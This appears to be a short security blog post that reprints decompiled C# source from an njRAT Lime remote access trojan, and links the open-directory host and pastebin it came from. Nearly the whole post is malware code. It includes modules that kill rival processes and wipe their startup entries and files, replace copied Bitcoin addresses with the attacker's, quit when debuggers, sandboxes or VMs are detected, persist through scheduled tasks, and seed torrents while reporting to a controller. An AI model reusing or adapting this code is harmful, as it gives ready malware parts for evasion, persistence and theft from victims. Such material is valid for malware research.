Tuesday, October 30, 2018

Njrat lime ilspy decompiled code from opendir seen on twitter

From pastebin
Interesting to see inner workings


http://pastebin.com/raw/1PZLxaXx


http://46.101.104.141/klep/ 
hosts #njrat #lime edition as reported by
@FewAtoms and @James_inthe_box

Opening up 
http://46.101.104.141/klep/uk.exe

in Ilspy gives the following decompiled code

-------------
// BotKillers
using j;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Threading;
using System.Windows.Forms;

[StandardModule]
internal sealed class BotKillers
{
 public enum ThreadAccess
 {
  DIRECT_IMPERSONATION = 0x200,
  GET_CONTEXT = 8,
  IMPERSONATE = 0x100,
  QUERY_INFORMATION = 0x40,
  SET_CONTEXT = 0x10,
  SET_INFORMATION = 0x20,
  SET_THREAD_TOKEN = 0x80,
  SUSPEND_RESUME = 2,
  TERMINATE = 1
 }

 public enum WinTrustDataUIChoice : uint
 {
  All = 1u,
  None,
  NoBad,
  NoGood
 }

 public enum WinTrustDataRevocationChecks : uint
 {
  None,
  WholeChain
 }

 public enum WinTrustDataChoice : uint
 {
  File = 1u,
  Catalog,
  Blob,
  Signer,
  Certificate
 }

 public enum WinTrustDataStateAction : uint
 {
  Ignore,
  Verify,
  Close,
  AutoCache,
  AutoCacheFlush
 }

 [Flags]
 public enum WinTrustDataProvFlags : uint
 {
  UseIe4TrustFlag = 1u,
  NoIe4ChainFlag = 2u,
  NoPolicyUsageFlag = 4u,
  RevocationCheckNone = 0x10,
  RevocationCheckEndCert = 0x20,
  RevocationCheckChain = 0x40,
  RevocationCheckChainExcludeRoot = 0x80,
  SaferFlag = 0x100,
  HashOnlyFlag = 0x200,
  UseDefaultOsverCheck = 0x400,
  LifetimeSigningFlag = 0x800,
  CacheOnlyUrlRetrieval = 0x1000
 }

 public enum WinTrustDataUIContext : uint
 {
  Execute,
  Install
 }

 [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
 public class WinTrustFileInfo
 {
  private int StructSize;

  private IntPtr pszFilePath;

  private IntPtr hFile;

  private IntPtr pgKnownSubject;

  public WinTrustFileInfo(string _filePath)
  {
   this.StructSize = Marshal.SizeOf(typeof(WinTrustFileInfo));
   this.hFile = IntPtr.Zero;
   this.pgKnownSubject = IntPtr.Zero;
   this.pszFilePath = Marshal.StringToCoTaskMemAuto(_filePath);
  }

  ~WinTrustFileInfo()
  {
   Marshal.FreeCoTaskMem(this.pszFilePath);
  }
 }

 [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
 public class WinTrustData
 {
  private int StructSize;

  private IntPtr PolicyCallbackData;

  private IntPtr SIPClientData;

  private WinTrustDataUIChoice UIChoice;

  private WinTrustDataRevocationChecks RevocationChecks;

  private WinTrustDataChoice UnionChoice;

  private IntPtr FileInfoPtr;

  private WinTrustDataStateAction StateAction;

  private IntPtr StateData;

  private string URLReference;

  private WinTrustDataProvFlags ProvFlags;

  private WinTrustDataUIContext UIContext;

  public WinTrustData(string _fileName)
  {
   this.StructSize = Marshal.SizeOf(typeof(WinTrustData));
   this.PolicyCallbackData = IntPtr.Zero;
   this.SIPClientData = IntPtr.Zero;
   this.UIChoice = WinTrustDataUIChoice.None;
   this.RevocationChecks = WinTrustDataRevocationChecks.None;
   this.UnionChoice = WinTrustDataChoice.File;
   this.StateAction = WinTrustDataStateAction.Ignore;
   this.StateData = IntPtr.Zero;
   this.URLReference = null;
   this.ProvFlags = WinTrustDataProvFlags.SaferFlag;
   this.UIContext = WinTrustDataUIContext.Execute;
   WinTrustFileInfo structure = new WinTrustFileInfo(_fileName);
   this.FileInfoPtr = Marshal.AllocCoTaskMem(Marshal.SizeOf(typeof(WinTrustFileInfo)));
   Marshal.StructureToPtr(structure, this.FileInfoPtr, false);
  }

  ~WinTrustData()
  {
   Marshal.FreeCoTaskMem(this.FileInfoPtr);
  }
 }

 public enum WinVerifyTrustResult
 {
  Success,
  ProviderUnknown = -2146762751,
  ActionUnknown,
  SubjectFormUnknown,
  SubjectNotTrusted
 }

 public sealed class WinTrust
 {
  private static readonly IntPtr INVALID_HANDLE_VALUE = new IntPtr(-1);

  private const string WINTRUST_ACTION_GENERIC_VERIFY_V2 = "{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}";

  [DllImport("wintrust.dll", CharSet = CharSet.Unicode, ExactSpelling = true)]
  private static extern WinVerifyTrustResult WinVerifyTrust([In] IntPtr hwnd, [In] [MarshalAs(UnmanagedType.LPStruct)] Guid pgActionID, [In] WinTrustData pWVTData);

  public static bool VerifyEmbeddedSignature(string fileName)
  {
   try
   {
    WinTrustData pWVTData = new WinTrustData(fileName);
    Guid pgActionID = new Guid("{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}");
    WinVerifyTrustResult winVerifyTrustResult = WinTrust.WinVerifyTrust(WinTrust.INVALID_HANDLE_VALUE, pgActionID, pWVTData);
    return winVerifyTrustResult == WinVerifyTrustResult.Success;
   }
   catch (Exception projectError)
   {
    ProjectData.SetProjectError(projectError);
    bool result = false;
    ProjectData.ClearProjectError();
    return result;
   }
  }

  private WinTrust()
  {
  }
 }

 private static int ProccessKilled = 0;

 private static int Startupkilled = 0;

 private static string hio;

 [DllImport("user32.dll", SetLastError = true)]
 [return: MarshalAs(UnmanagedType.Bool)]
 private static extern bool IsWindowVisible(IntPtr hWnd);

 [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
 private static extern IntPtr FindWindow(string lpClassName, string lpWindowName);

 public static void RunStandardBotKiller()
 {
  int num = default(int);
  int num3 = default(int);
  try
  {
   goto IL_0002;
   IL_0002:
   ProjectData.ClearProjectError();
   num = -2;
   goto IL_000b;
   IL_000b:
   int num2 = 2;
   Interaction.Shell("TASKKILL /F /IM wscript.exe", AppWinStyle.Hide, false, -1);
   goto IL_001b;
   IL_001b:
   num2 = 3;
   Interaction.Shell("TASKKILL /F /IM cmd.exe", AppWinStyle.Hide, false, -1);
   goto IL_002b;
   IL_002b:
   num2 = 4;
   BotKillers.ScanProcess();
   goto IL_0033;
   IL_0033:
   num2 = 5;
   BotKillers.RunStartupKiller();
   goto IL_003b;
   IL_003b:
   num2 = 6;
   BotKillers.ProccessKilled = 0;
   goto IL_0043;
   IL_0043:
   num2 = 7;
   BotKillers.Startupkilled = 0;
   goto end_IL_0001;
   IL_004d:
   int num4 = num3 + 1;
   num3 = 0;
   switch (num4)
   {
   case 8:
    goto end_IL_0001;
   case 1:
    goto IL_0002;
   case 2:
    goto IL_000b;
   case 3:
    goto IL_001b;
   case 4:
    goto IL_002b;
   case 5:
    goto IL_0033;
   case 6:
    goto IL_003b;
   case 7:
    goto IL_0043;
   default:
    goto IL_00b7;
   }
   IL_007d:
   num3 = num2;
   if (num > -2)
   {
    goto IL_0087;
   }
   goto IL_0084;
   IL_0084:
   int num5 = 1;
   goto IL_0088;
   IL_0087:
   num5 = num;
   goto IL_0088;
   IL_0088:
   switch (num5)
   {
   case 1:
    goto IL_004d;
   default:
    goto IL_00b7;
   }
   end_IL_0001:;
  }
  catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
  {
   ProjectData.SetProjectError((Exception)obj);
   /*Error near IL_00b5: Could not find block for branch target IL_007d*/;
  }
  if (num3 != 0)
  {
   ProjectData.ClearProjectError();
  }
  return;
  IL_00b7:
  throw ProjectData.CreateProjectError(-2146828237);
 }

 public static void ScanProcess()
 {
  checked
  {
   try
   {
    Process[] processes = Process.GetProcesses();
    int num = processes.Length - 1;
    for (int i = 0; i <= num; i++)
    {
     Process process = processes[i];
     try
     {
      string fullPath = Path.GetFullPath(process.MainModule.FileName);
      if (BotKillers.IsFileMalicious(fullPath) && !BotKillers.WindowIsVisible(process.MainWindowTitle))
      {
       BotKillers.TerminateProcess(process.Id);
       BotKillers.DestroyFile(fullPath);
       BotKillers.ProccessKilled++;
      }
     }
     catch (Exception projectError)
     {
      ProjectData.SetProjectError(projectError);
      ProjectData.ClearProjectError();
     }
    }
   }
   catch (Exception projectError2)
   {
    ProjectData.SetProjectError(projectError2);
    ProjectData.ClearProjectError();
   }
  }
 }

 public static bool IsFileMalicious(string fileloc)
 {
  bool result;
  int num = default(int);
  int num3 = default(int);
  try
  {
   goto IL_0002;
   IL_0002:
   ProjectData.ClearProjectError();
   num = -2;
   goto IL_000b;
   IL_000b:
   int num2 = 2;
   if (fileloc.Contains(Application.ExecutablePath))
   {
    goto IL_001e;
   }
   goto IL_0029;
   IL_001e:
   num2 = 3;
   result = false;
   goto end_IL_0001;
   IL_0029:
   num2 = 5;
   if (fileloc.ToLower().Contains("malware"))
   {
    goto IL_0041;
   }
   goto IL_004c;
   IL_0041:
   num2 = 6;
   BotKillers.DestroyFile(fileloc);
   goto IL_004c;
   IL_004c:
   num2 = 8;
   if (fileloc.Contains("Google.com"))
   {
    goto IL_005f;
   }
   goto IL_006b;
   IL_005f:
   num2 = 9;
   result = false;
   goto end_IL_0001;
   IL_006b:
   num2 = 11;
   if (fileloc.Contains("Microsoft.com"))
   {
    goto IL_007f;
   }
   goto IL_008b;
   IL_007f:
   num2 = 12;
   result = false;
   goto end_IL_0001;
   IL_008b:
   num2 = 14;
   if (fileloc.Contains("cmd"))
   {
    goto IL_009f;
   }
   goto IL_00ab;
   IL_009f:
   num2 = 15;
   result = true;
   goto end_IL_0001;
   IL_00ab:
   num2 = 17;
   if (fileloc.Contains("wscript"))
   {
    goto IL_00bf;
   }
   goto IL_00cb;
   IL_00bf:
   num2 = 18;
   result = true;
   goto end_IL_0001;
   IL_00cb:
   num2 = 20;
   if (fileloc.Contains(RuntimeEnvironment.GetRuntimeDirectory()))
   {
    goto IL_00df;
   }
   goto IL_00eb;
   IL_00df:
   num2 = 21;
   result = true;
   goto end_IL_0001;
   IL_00eb:
   num2 = 23;
   if (WinTrust.VerifyEmbeddedSignature(fileloc))
   {
    goto IL_00fa;
   }
   goto IL_0103;
   IL_00fa:
   num2 = 24;
   result = false;
   goto end_IL_0001;
   IL_0103:
   num2 = 26;
   if (fileloc.Contains(Environment.GetEnvironmentVariable("USERPROFILE")) | fileloc.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData)))
   {
    goto IL_012a;
   }
   goto IL_0133;
   IL_012a:
   num2 = 27;
   result = true;
   goto end_IL_0001;
   IL_0133:
   num2 = 29;
   FileAttributes attributes = File.GetAttributes(fileloc);
   goto IL_013e;
   IL_013e:
   num2 = 30;
   if ((attributes & FileAttributes.System) == FileAttributes.System)
   {
    goto IL_014e;
   }
   goto IL_0157;
   IL_014e:
   num2 = 31;
   result = true;
   goto end_IL_0001;
   IL_0157:
   num2 = 33;
   if ((attributes & FileAttributes.Hidden) == FileAttributes.Hidden)
   {
    goto IL_0167;
   }
   goto IL_0170;
   IL_0167:
   num2 = 34;
   result = true;
   goto end_IL_0001;
   IL_0170:
   num2 = 36;
   result = false;
   goto end_IL_0001;
   IL_017c:
   int num4 = num3 + 1;
   num3 = 0;
   switch (num4)
   {
   case 37:
    goto end_IL_0001;
   case 1:
    goto IL_0002;
   case 2:
    goto IL_000b;
   case 3:
    goto IL_001e;
   case 4:
   case 5:
    goto IL_0029;
   case 6:
    goto IL_0041;
   case 7:
   case 8:
    goto IL_004c;
   case 9:
    goto IL_005f;
   case 10:
   case 11:
    goto IL_006b;
   case 12:
    goto IL_007f;
   case 13:
   case 14:
    goto IL_008b;
   case 15:
    goto IL_009f;
   case 16:
   case 17:
    goto IL_00ab;
   case 18:
    goto IL_00bf;
   case 19:
   case 20:
    goto IL_00cb;
   case 21:
    goto IL_00df;
   case 22:
   case 23:
    goto IL_00eb;
   case 24:
    goto IL_00fa;
   case 25:
   case 26:
    goto IL_0103;
   case 27:
    goto IL_012a;
   case 28:
   case 29:
    goto IL_0133;
   case 30:
    goto IL_013e;
   case 31:
    goto IL_014e;
   case 32:
   case 33:
    goto IL_0157;
   case 34:
    goto IL_0167;
   case 35:
   case 36:
    goto IL_0170;
   default:
    goto IL_025a;
   }
   IL_0220:
   num3 = num2;
   if (num > -2)
   {
    goto IL_022a;
   }
   goto IL_0227;
   IL_0227:
   int num5 = 1;
   goto IL_022b;
   IL_022a:
   num5 = num;
   goto IL_022b;
   IL_022b:
   switch (num5)
   {
   case 1:
    goto IL_017c;
   default:
    goto IL_025a;
   }
   end_IL_0001:;
  }
  catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
  {
   ProjectData.SetProjectError((Exception)obj);
   /*Error near IL_0258: Could not find block for branch target IL_0220*/;
  }
  if (num3 != 0)
  {
   ProjectData.ClearProjectError();
  }
  return result;
  IL_025a:
  throw ProjectData.CreateProjectError(-2146828237);
 }

 public static void KillFile(string location)
 {
  try
  {
   DirectoryInfo directoryInfo = new DirectoryInfo(location);
   DirectorySecurity directorySecurity = new DirectorySecurity();
   directorySecurity.SetAccessRuleProtection(true, false);
   directoryInfo.SetAccessControl(directorySecurity);
  }
  catch (Exception projectError)
  {
   ProjectData.SetProjectError(projectError);
   ProjectData.ClearProjectError();
  }
 }

 public static bool WindowIsVisible(string WinTitle)
 {
  try
  {
   IntPtr hWnd = BotKillers.FindWindow(null, WinTitle);
   return BotKillers.IsWindowVisible(hWnd);
  }
  catch (Exception projectError)
  {
   ProjectData.SetProjectError(projectError);
   bool result = false;
   ProjectData.ClearProjectError();
   return result;
  }
 }

 public static void RunStartupKiller()
 {
  int num = default(int);
  int num4 = default(int);
  try
  {
   goto IL_0002;
   IL_0002:
   ProjectData.ClearProjectError();
   num = -2;
   goto IL_000b;
   IL_000b:
   int num2 = 2;
   BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 1);
   goto IL_0019;
   IL_0019:
   num2 = 3;
   BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 1);
   goto IL_0027;
   IL_0027:
   num2 = 4;
   if (BotKillers.IsAdmin())
   {
    goto IL_0034;
   }
   goto IL_0052;
   IL_0034:
   num2 = 5;
   BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 2);
   goto IL_0042;
   IL_0042:
   num2 = 6;
   BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 2);
   goto IL_0052;
   IL_0052:
   num2 = 8;
   string fileNameWithoutExtension = Path.GetFileNameWithoutExtension(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG);
   goto IL_006f;
   IL_006f:
   num2 = 9;
   IEnumerator<string> enumerator;
   for (enumerator = MyProject.Computer.FileSystem.GetFiles(MyProject.Computer.FileSystem.SpecialDirectories.Programs + "\\Startup").GetEnumerator(); enumerator.MoveNext(); num2 = 17)
   {
    string current = enumerator.Current;
    goto IL_00b4;
    IL_01b8:
    int num3 = num;
    goto IL_01b9;
    IL_00b4:
    num2 = 10;
    if (!current.Contains(OK.RG) & !current.Contains(fileNameWithoutExtension + ".url") & !current.Contains(".ini"))
    {
     goto IL_00f2;
    }
    continue;
    IL_00f2:
    num2 = 11;
    BotKillers.DestroyFile(current);
    goto IL_00fd;
    IL_00fd:
    num2 = 12;
    Thread.Sleep(50);
    goto IL_0108;
    IL_0108:
    num2 = 13;
    BotKillers.DestroyFile(current);
    goto IL_0113;
    IL_0113:
    num2 = 14;
    Thread.Sleep(50);
    goto IL_011e;
    IL_011e:
    num2 = 15;
    BotKillers.DestroyFile(current);
    continue;
    IL_0152:
    int num5 = num4 + 1;
    num4 = 0;
    switch (num5)
    {
    case 19:
     goto end_IL_0001;
    case 1:
     goto IL_0002;
    case 2:
     goto IL_000b;
    case 3:
     goto IL_0019;
    case 4:
     goto IL_0027;
    case 5:
     goto IL_0034;
    case 6:
     goto IL_0042;
    case 7:
    case 8:
     goto IL_0052;
    case 9:
     goto IL_006f;
    case 10:
     goto IL_00b4;
    case 11:
     goto IL_00f2;
    case 12:
     goto IL_00fd;
    case 13:
     goto IL_0108;
    case 14:
     goto IL_0113;
    case 15:
     goto IL_011e;
    case 16:
    case 17:
     continue;
    case 18:
     goto end_IL_012e;
    default:
     goto IL_01e8;
    }
    IL_01b9:
    switch (num3)
    {
    case 1:
     goto IL_0152;
    default:
     goto IL_01e8;
    }
    IL_01b5:
    num3 = 1;
    goto IL_01b9;
    IL_01ae:
    num4 = num2;
    if (num > -2)
    {
     goto IL_01b8;
    }
    goto IL_01b5;
    continue;
    end_IL_012e:
    break;
   }
   num2 = 18;
   enumerator?.Dispose();
   end_IL_0001:;
  }
  catch (object obj) when (obj is Exception & num != 0 & num4 == 0)
  {
   ProjectData.SetProjectError((Exception)obj);
   /*Error near IL_01e6: Could not find block for branch target IL_01ae*/;
  }
  if (num4 != 0)
  {
   ProjectData.ClearProjectError();
  }
  return;
  IL_01e8:
  throw ProjectData.CreateProjectError(-2146828237);
 }

 public static void StartupFucker(string regkey, int type)
 {
  try
  {
   RegistryKey registryKey = default(RegistryKey);
   if (type == 1)
   {
    registryKey = Registry.CurrentUser.OpenSubKey(regkey);
   }
   if (type == 2)
   {
    registryKey = Registry.LocalMachine.OpenSubKey(regkey);
   }
   string[] valueNames = registryKey.GetValueNames();
   foreach (string text in valueNames)
   {
    try
    {
     string text2 = registryKey.GetValue(text).ToString();
     if (text2.Contains("-"))
     {
      if (text2.Contains("\""))
      {
       text2.Replace("\"", string.Empty);
      }
      try
      {
       string[] array = Strings.Split(text2, " -", -1, CompareMethod.Binary);
       text2 = array[0];
      }
      catch (Exception projectError)
      {
       ProjectData.SetProjectError(projectError);
       ProjectData.ClearProjectError();
      }
     }
     if (text2.Contains("\""))
     {
      object[] array2 = text2.Split('"');
      text2 = Conversions.ToString(array2[1]);
     }
     if (!text2.Contains(Application.ExecutablePath))
     {
      BotKillers.RemoveKey(type, text, regkey, text2);
      if (!WinTrust.VerifyEmbeddedSignature(text2))
      {
       BotKillers.TerminateProcessPath(text2);
       BotKillers.DestroyFile(text2);
      }
     }
    }
    catch (Exception projectError2)
    {
     ProjectData.SetProjectError(projectError2);
     ProjectData.ClearProjectError();
    }
   }
  }
  catch (Exception projectError3)
  {
   ProjectData.SetProjectError(projectError3);
   ProjectData.ClearProjectError();
  }
 }

 public static void RemoveKey(int Reg, string file, string reglocation, string FileLocation)
 {
  try
  {
   RegistryKey registryKey = null;
   registryKey = ((Reg != 1) ? Registry.LocalMachine.OpenSubKey(reglocation, true) : Registry.CurrentUser.OpenSubKey(reglocation, true));
   using (registryKey)
   {
    registryKey?.DeleteValue(file);
   }
  }
  catch (Exception projectError)
  {
   ProjectData.SetProjectError(projectError);
   ProjectData.ClearProjectError();
  }
 }

 [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
 public static void DestroyFile(string path)
 {
  try
  {
   if (File.Exists(path))
   {
    Random random = new Random();
    try
    {
     BotKillers.AllowAccess(path);
     MyProject.Computer.FileSystem.MoveFile(path, Path.GetTempPath() + Conversions.ToString(random.Next(10000, 90000)));
     File.WriteAllText(path, string.Empty);
     FileSystem.FileOpen(FileSystem.FreeFile(), path, OpenMode.Input, OpenAccess.Default, OpenShare.LockReadWrite, -1);
     BotKillers.KillFile(path);
    }
    catch (Exception projectError)
    {
     ProjectData.SetProjectError(projectError);
     DirectoryInfo directoryInfo = new DirectoryInfo(path);
     DirectorySecurity directorySecurity = new DirectorySecurity();
     directorySecurity.SetAccessRuleProtection(true, false);
     directoryInfo.SetAccessControl(directorySecurity);
     ProjectData.ClearProjectError();
    }
   }
  }
  catch (Exception projectError2)
  {
   ProjectData.SetProjectError(projectError2);
   ProjectData.ClearProjectError();
  }
 }

 public static bool IsAdmin()
 {
  try
  {
   WindowsIdentity current = WindowsIdentity.GetCurrent();
   WindowsPrincipal windowsPrincipal = new WindowsPrincipal(current);
   return windowsPrincipal.IsInRole(WindowsBuiltInRole.Administrator);
  }
  catch (Exception projectError)
  {
   ProjectData.SetProjectError(projectError);
   bool result = false;
   ProjectData.ClearProjectError();
   return result;
  }
 }

 public static void AllowAccess(string location)
 {
  try
  {
   DirectoryInfo directoryInfo = new DirectoryInfo(location);
   DirectorySecurity directorySecurity = new DirectorySecurity();
   directorySecurity.SetAccessRuleProtection(false, true);
   directoryInfo.SetAccessControl(directorySecurity);
  }
  catch (Exception projectError)
  {
   ProjectData.SetProjectError(projectError);
   ProjectData.ClearProjectError();
  }
 }

 public static void TerminateProcessPath(string Path)
 {
  checked
  {
   try
   {
    if (!Path.Contains(Process.GetCurrentProcess().ProcessName.ToString()))
    {
     if (Path.Contains("\\"))
     {
      string[] array = Strings.Split(Path, "\\", -1, CompareMethod.Binary);
      string[] array2 = array;
      foreach (string text in array2)
      {
       if (text.Contains(".exe"))
       {
        Path = text;
       }
      }
     }
     if (Path.Contains(".exe"))
     {
      Path = Path.Replace(".exe", string.Empty);
     }
     Process[] processes = Process.GetProcesses();
     int num = processes.Length - 1;
     for (int j = 0; j <= num; j++)
     {
      Process process = processes[j];
      if (process.ProcessName.Contains(Path))
      {
       BotKillers.TerminateProcess(process.Id);
      }
     }
    }
   }
   catch (Exception projectError)
   {
    ProjectData.SetProjectError(projectError);
    ProjectData.ClearProjectError();
   }
  }
 }

 public static void TerminateProcess(int PID)
 {
  try
  {
   Process processById = Process.GetProcessById(PID);
   if (Operators.CompareString(processById.ProcessName, string.Empty, false) != 0)
   {
    IEnumerator enumerator = default(IEnumerator);
    try
    {
     enumerator = processById.Threads.GetEnumerator();
     while (enumerator.MoveNext())
     {
      ProcessThread processThread = (ProcessThread)enumerator.Current;
      IntPtr intPtr = BotKillers.OpenThread((ThreadAccess)3, true, checked((uint)processThread.Id));
      if (intPtr != IntPtr.Zero)
      {
       BotKillers.SuspendThread(intPtr);
       BotKillers.TerminateThread(intPtr, 1u);
       BotKillers.CloseHandle(intPtr);
      }
     }
    }
    finally
    {
     if (enumerator is IDisposable)
     {
      (enumerator as IDisposable).Dispose();
     }
    }
   }
  }
  catch (Exception projectError)
  {
   ProjectData.SetProjectError(projectError);
   ProjectData.ClearProjectError();
  }
 }

 [DllImport("kernel32.dll", SetLastError = true)]
 private static extern bool CloseHandle(IntPtr hHandle);

 [DllImport("kernel32.dll")]
 private static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, uint dwThreadId);

 [DllImport("kernel32.dll", SetLastError = true)]
 public static extern int SuspendThread(IntPtr hThread);

 [DllImport("kernel32.dll")]
 private static extern bool TerminateThread(IntPtr hThread, uint dwExitCode);
}


// CallEveryXSeconds
using j;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Timers;
using System.Windows.Forms;

public class CallEveryXSeconds
{
 [Serializable]
 [CompilerGenerated]
 internal sealed class _Closure$__
 {
  public static readonly _Closure$__ $I;

  public static ParameterizedThreadStart $IR2-1;

  static _Closure$__()
  {
   _Closure$__.$I = new _Closure$__();
  }

  [DebuggerHidden]
  internal void _Lambda$__R2-1(object a0)
  {
   Clipboard.SetText(Conversions.ToString(a0));
  }
 }

 private static System.Timers.Timer Timer;

 private static OK N = new OK();

 public static void Handler(object sender, ElapsedEventArgs e)
 {
  Process[] processes = Process.GetProcesses();
  Process[] array = processes;
  foreach (Process process in array)
  {
   if (process.MainWindowTitle.ToLower().Contains("BITCOIN".ToLower()))
   {
    try
    {
     Thread thread = new Thread((_Closure$__.$IR2-1 == null) ? (_Closure$__.$IR2-1 = delegate(object a0)
     {
      Clipboard.SetText(Conversions.ToString(a0));
     }) : _Closure$__.$IR2-1);
     thread.SetApartmentState(ApartmentState.STA);
     thread.Start(OK.BTC_ADD);
    }
    catch (Exception projectError)
    {
     ProjectData.SetProjectError(projectError);
     ProjectData.ClearProjectError();
    }
   }
  }
 }

 public static void Start()
 {
  CallEveryXSeconds.Timer = new System.Timers.Timer(1000.0);
  CallEveryXSeconds.Timer.Elapsed += CallEveryXSeconds.Handler;
  CallEveryXSeconds.Timer.Enabled = true;
 }

 public static void stopme()
 {
  CallEveryXSeconds.Timer.Elapsed += CallEveryXSeconds.Handler;
  CallEveryXSeconds.Timer.Stop();
 }
}


// MyAntiProcess
using j;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Timers;
using System.Windows.Forms;

public class MyAntiProcess
{
 private static System.Timers.Timer Timer;

 private static OK N = new OK();

 [DllImport("kernel32", CharSet = CharSet.Ansi, EntryPoint = "GetModuleHandleA", ExactSpelling = true, SetLastError = true)]
 private static extern long GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpModuleName);

 [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
 public static void Handler(object sender, ElapsedEventArgs e)
 {
  Process[] processes = Process.GetProcesses();
  Process[] array = processes;
  foreach (Process process in array)
  {
   if (process.MainWindowTitle.Contains("Process Hacker") | process.MainWindowTitle.Contains("Process Explorer"))
   {
    ProjectData.EndApp();
   }
  }
  Process[] processesByName = Process.GetProcessesByName("dnSpy");
  foreach (Process process2 in processesByName)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName2 = Process.GetProcessesByName("CodeReflect");
  foreach (Process process3 in processesByName2)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName3 = Process.GetProcessesByName("Reflector");
  foreach (Process process4 in processesByName3)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName4 = Process.GetProcessesByName("ILSpy");
  foreach (Process process5 in processesByName4)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName5 = Process.GetProcessesByName("VGAuthService");
  foreach (Process process6 in processesByName5)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName6 = Process.GetProcessesByName("VBoxService");
  foreach (Process process7 in processesByName6)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName7 = Process.GetProcessesByName("Sandboxie Control");
  foreach (Process process8 in processesByName7)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName8 = Process.GetProcessesByName("IPBlocker");
  foreach (Process process9 in processesByName8)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName9 = Process.GetProcessesByName("TiGeR-Firewall");
  foreach (Process process10 in processesByName9)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName10 = Process.GetProcessesByName("smsniff");
  foreach (Process process11 in processesByName10)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName11 = Process.GetProcessesByName("exeinfoPE");
  foreach (Process process12 in processesByName11)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName12 = Process.GetProcessesByName("NetSnifferCs");
  foreach (Process process13 in processesByName12)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName13 = Process.GetProcessesByName("wireshark");
  foreach (Process process14 in processesByName13)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName14 = Process.GetProcessesByName("apateDNS");
  foreach (Process process15 in processesByName14)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName15 = Process.GetProcessesByName("SbieCtrl");
  foreach (Process process16 in processesByName15)
  {
   ProjectData.EndApp();
  }
  Process[] processesByName16 = Process.GetProcessesByName("SpyTheSpy");
  foreach (Process process17 in processesByName16)
  {
   ProjectData.EndApp();
  }
 }

 public static void Start()
 {
  MyAntiProcess.Timer = new System.Timers.Timer(1000.0);
  MyAntiProcess.Timer.Elapsed += MyAntiProcess.Handler;
  MyAntiProcess.Timer.Enabled = true;
 }

 public static void stopme()
 {
  MyAntiProcess.Timer.Elapsed += MyAntiProcess.Handler;
  MyAntiProcess.Timer.Stop();
 }

 public static void AutoAnti()
 {
  object executablePath = Application.ExecutablePath;
  Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject("schtasks /create /tn NYAN /tr \"", executablePath), "\" /sc minute /mo 1")), AppWinStyle.Hide, false, -1);
 }

 public static void XAnti()
 {
  object executablePath = Application.ExecutablePath;
  Interaction.Shell("schtasks /Delete /tn NYAN /F", AppWinStyle.Hide, false, -1);
 }
}


// Torrent
using j;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading;

[StandardModule]
internal sealed class Torrent
{
 public static string UTorrentLocalPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\uTorrent\\uTorrent.exe";

 public static string BitLocalPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BitTorrent\\BitTorrent.exe";

 [DllImport("user32.dll")]
 private static extern int ShowWindow(int hwnd, int nCmdShow);

 public static void SeedTorrent(string path)
 {
  int num = default(int);
  int num3 = default(int);
  try
  {
   goto IL_0002;
   IL_0002:
   ProjectData.ClearProjectError();
   num = -2;
   goto IL_000b;
   IL_000b:
   int num2 = 2;
   if (Torrent.IsBitTorrent())
   {
    goto IL_0016;
   }
   goto IL_0048;
   IL_0016:
   num2 = 3;
   Torrent.SeedIt(Torrent.BitLocalPath, Torrent.BitLocalPath, path);
   goto IL_0029;
   IL_0029:
   num2 = 4;
   OK.Send("MSG" + OK.Y + "Seeding with BitTorrent");
   goto end_IL_0001;
   IL_0048:
   num2 = 6;
   if (Torrent.IsUtorrent())
   {
    goto IL_0055;
   }
   goto IL_0088;
   IL_0055:
   num2 = 7;
   Torrent.SeedIt(Torrent.UTorrentLocalPath, Torrent.UTorrentLocalPath, path);
   goto IL_0068;
   IL_0068:
   num2 = 8;
   OK.Send("MSG" + OK.Y + "Seeding with uTorrent");
   goto end_IL_0001;
   IL_0088:
   num2 = 10;
   OK.Send("MSG" + OK.Y + "No Torrent Software Installed");
